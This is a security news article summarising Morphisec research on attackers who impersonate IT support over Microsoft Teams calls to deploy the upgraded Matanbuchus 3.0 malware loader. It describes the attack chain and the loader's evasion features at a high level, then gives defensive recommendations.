Malicious actors are weaponizing Microsoft Teams voice calls to distribute an upgraded version of the Matanbuchus malware loader in highly targeted social engineering attacks, posing as corporate IT support to compromise victims. The campaign, analyzed in-depth by researchers at Morphisec, reveals significant enhancements in Matanbuchus 3.0's evasion, obfuscation, and post-compromise capabilities, making it a formidable threat to enterprise environments.

The Attack Chain: From Teams Call to Full Compromise
The intrusion begins with an external Microsoft Teams call. Attackers, masquerading as legitimate IT helpdesk personnel, convince the target to launch Windows' built-in Quick Assist tool. Once remote control is established, the victim is instructed to execute a malicious PowerShell script. This script downloads and extracts a ZIP archive containing three files, which deploy the Matanbuchus loader onto the device via DLL side-loading.

Matanbuchus Attack Chain via Microsoft Teams
Source: Morphisec

Matanbuchus 3.0: A Major Evolution in Stealth and Capability
Morphisec's analysis highlights substantial upgrades in this iteration:

  1. Enhanced Evasion & Obfuscation: The loader switched C2 communication and string obfuscation from RC4 to the Salsa20 algorithm. Crucially, it now bypasses security monitoring by executing syscalls directly via custom shellcode, avoiding Windows API functions and evading EDR hooks. API calls are further obscured using the MurmurHash3 function, hindering static analysis.
  2. Anti-Analysis Measures: A new anti-sandbox routine verifies the victim's locale before execution, ensuring the malware only runs on intended targets. It also performs detailed reconnaissance, collecting usernames, domains, OS build info, running security processes (EDR/AV), and user privilege levels.
  3. Expanded Payload Delivery: Matanbuchus 3.0 can execute various payloads directly in memory, including CMD commands, PowerShell scripts, EXE/DLL/MSI files, and shellcode. Its execution methods are dynamically tailored based on the victim's specific security stack.

Why This Matters: The Escalating Threat to Collaboration Platforms
This campaign exemplifies a disturbing trend of attackers relentlessly targeting trusted communication channels like Microsoft Teams. The platform's "External Access" feature, if configured loosely, provides fertile ground for social engineering. Matanbuchus 3.0's technical sophistication signifies a dangerous evolution:

  • Increased Stealth: Direct syscalls and advanced obfuscation make detection significantly harder for traditional security tools.
  • Precision Targeting: The use of Quick Assist and tailored payloads indicates attackers are investing heavily in operational success per victim.
  • Broad Impact Potential: As a Malware-as-a-Service (MaaS) offering, this enhanced loader lowers the barrier for other threat actors to conduct sophisticated attacks.

Mitigation and Vigilance Required
Organizations must reassess their Microsoft Teams security posture, particularly scrutinizing "External Access" settings and user training regarding unsolicited support requests. Vigilant monitoring of PowerShell execution and Quick Assist usage is critical. Morphisec emphasizes that Matanbuchus has matured "into a sophisticated threat," demanding layered defenses capable of detecting complex in-memory execution and living-off-the-land techniques. The technical details and Indicators of Compromise (IoCs) provided by Morphisec offer essential resources for defenders hunting this evolving menace.

Source: Analysis based on research by Morphisec, originally reported by BleepingComputer (https://www.bleepingcomputer.com/news/security/microsoft-teams-voice-calls-abused-to-push-matanbuchus-malware/).